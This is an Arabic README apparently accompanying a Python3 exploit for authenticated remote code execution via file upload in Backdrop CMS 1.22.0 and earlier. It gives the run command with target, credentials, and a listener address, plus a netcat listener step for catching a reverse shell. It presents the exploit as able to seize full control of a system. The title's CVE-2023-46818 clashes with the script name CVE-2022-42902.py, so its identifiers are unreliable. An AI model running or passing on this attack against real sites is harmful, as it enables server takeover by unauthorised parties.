
استغلال Python3 لـ CVE-2023-46818 في Backdrop CMS <= 1.22.0 — تنفيذ أوامر عن بُعد موثّق (RCE)
يستهدف هذا السكربت الاستغلالي المكتوب بلغة Python ثغرة رفع الملفات غير المقيدة في Backdrop CMS لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).
الإصدار 1.22.0 والإصدارات السابقة له ملاحظة: يعترض Backdrop CMS على ذلك ويجادل بأن صلاحيات متقدمة مطلوبة، ولهذا السبب قد تظل موجودة في الإصدارات الأحدث من 1.22.0. أعتقد أنهم يقصدون أنك ستحتاج إلى صلاحية وصول كمسؤول أولاً. ومع ذلك، فهي ثغرة صالحة، ويمكن بالتأكيد استغلالها للسيطرة الكاملة على النظام.
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
مهم: ابدأ المستمع (listener) قبل تشغيل السكربت:
nc -lvnp <listener_port>
